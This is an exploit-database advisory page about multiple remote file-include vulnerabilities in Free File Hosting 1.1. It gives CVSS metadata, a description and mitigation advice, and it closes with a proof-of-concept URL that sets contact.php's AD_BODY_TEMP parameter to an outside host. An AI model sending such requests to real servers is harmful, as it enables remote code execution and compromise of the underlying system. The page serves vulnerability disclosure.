header-logo
Suggest Exploit
vendor:
Free File Hosting
by:
7.5
CVSS
HIGH
Remote File-Include
CWE
Product Name: Free File Hosting
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE:
CPE: a:free_file_hosting_project:free_file_hosting:1.1
Metasploit:
Other Scripts:
Platforms Tested:

Remote File-Include Vulnerabilities in Free File Hosting

Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Mitigation:

Implement proper input validation and sanitization techniques to prevent remote file-include vulnerabilities. Regularly update and patch the Free File Hosting software.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23118/info

Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Version 1.1 is vulnerable to these issues.

This BID was incorrectly reporting Free File Upload script as the affected package. Free File Upload script is the demo version of the Free File Hosting script.

This issue is related to BID 20781 - Free File Hosting Forgot_Pass.PHP Remote File Include Vulnerability. 

http://www.example.com/contact.php?AD_BODY_TEMP=http://www.example2.com